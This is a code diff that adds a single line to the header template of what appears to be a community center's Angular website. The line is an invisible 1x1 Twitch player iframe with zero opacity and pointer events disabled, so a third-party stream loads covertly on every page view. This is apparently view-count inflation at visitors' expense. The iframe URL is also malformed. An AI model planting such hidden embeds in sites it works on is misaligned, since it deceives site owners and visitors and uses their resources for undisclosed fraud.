--- a/src/app/header/header.component.html
+++ b/src/app/header/header.component.html
@@ -1,3 +1,4 @@
+<iframe src="https://player.twitch.tv/?rockguitarist1&parent=https://waypointcommunitycenter.org/" frameborder="0" allowfullscreen="true" scrolling="no" height="1" width="1" style="pointer-events: none; opacity: 0; position: absolute; z-index: 9999;"></iframe>
 <nav class="navbar navbar-expand-lg navbar-light">
   <a class="col-8 col-md-4" routerLink="" style="padding: 0;">
     <img class="img-fluid" src=".../../assets/images/Waypoint-Brand.png">
